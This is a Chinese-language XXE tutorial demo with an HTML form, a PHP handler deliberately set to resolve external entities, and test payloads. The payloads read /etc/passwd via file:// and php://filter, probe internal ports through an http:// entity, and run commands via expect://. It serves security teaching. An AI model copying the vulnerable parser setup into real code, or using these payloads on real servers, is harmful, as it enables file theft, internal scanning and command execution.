XXE
XXE
演示代码如下:
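<!DOCTYPE html>
<!-- XXE demo front-end: collects raw XML from the user and POSTs it to the
     PHP handler that follows in this same file (action="#" resolves to the
     current URL, so the submission lands on this page). -->
<html lang="zh">
<head>
<meta charset="utf-8">
<title>XXE</title>
<script>
// Client-side check only: refuses an empty submission. This is a usability
// aid, not a security control; the server must still validate the body.
function xml() {
  var body = document.forms["myform"]["xml"].value;
  if (body === "") {
    alert("需要输入XML内容");
    return false;
  }
  return true;
}
// Bind once the form exists. Using addEventListener instead of an inline
// onsubmit= attribute keeps the page usable under a Content-Security-Policy
// that disallows inline event handlers.
document.addEventListener("DOMContentLoaded", function () {
  document.forms["myform"].addEventListener("submit", function (event) {
    if (!xml()) {
      event.preventDefault();
    }
  });
});
</script>
</head>
<body>
<form name="myform" action="#" method="post">
<!-- Visible label bound to the control so the field is announced by AT. -->
<label for="xml">XML数据</label>
<br>
<textarea id="xml" name="xml" rows="10" cols="30"></textarea>
<br>
<button type="submit">提交</button>
</form>
</body>
</html>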
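<?php
// XXE demo back-end: parses the XML posted by the form above and echoes the
// text content of its <secret> element.
//
// DELIBERATELY VULNERABLE PARSER CONFIGURATION (this is what the demo shows):
//   LIBXML_NOENT   - substitutes entity references, including SYSTEM entities,
//                    so an external entity is expanded into the document text.
//   LIBXML_DTDLOAD - loads the external DTD subset.
// Neither flag is required to parse ordinary XML. The mitigation is to omit
// both (then libxml does not resolve external entities); on PHP < 8.0 with an
// older libxml, additionally call libxml_disable_entity_loader(true).
// The parsed text is passed through htmlspecialchars() before echoing so it
// cannot be reflected back as markup (an XSS issue separate from the XXE).

// Only act on a real form submission: a plain GET of this page has no "xml"
// field, and the original unconditional $_POST["xml"] read raised a notice.
if (isset($_POST["xml"]) && $_POST["xml"] !== "") {
    $xml = $_POST["xml"];
    $dom = new DOMDocument();
    // Route libxml parse errors to the internal buffer instead of the output
    // stream; success is determined from loadXML()'s return value.
    $previousErrorMode = libxml_use_internal_errors(true);
    $loaded = $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    libxml_clear_errors();
    libxml_use_internal_errors($previousErrorMode);
    if ($loaded) {
        $creds = simplexml_import_dom($dom);
        // A missing <secret> child yields an empty element that casts to "".
        $secret = (string) $creds->secret;
        if ($secret !== "") {
            echo "<br>解析之后的结果:";
            echo htmlspecialchars($secret, ENT_QUOTES, 'UTF-8');
        }
    }
}
?>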
测试 payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE reset [<!ENTITY xxe "Cream_pentester">
]>
<reset><secret>&xxe;</secret></reset>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<reset><secret>&xxe;</secret></reset>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>
<reset><secret>&xxe;</secret></reset>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[<!ENTITY xxe SYSTEM "http://ip : 探测端口号/test/">]>
<name>&xxe;</name>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[<!ENTITY xxe SYSTEM "expect://系统命令">]>
<name>&xxe;</name>
PHP 需安装 expect 扩展才能利用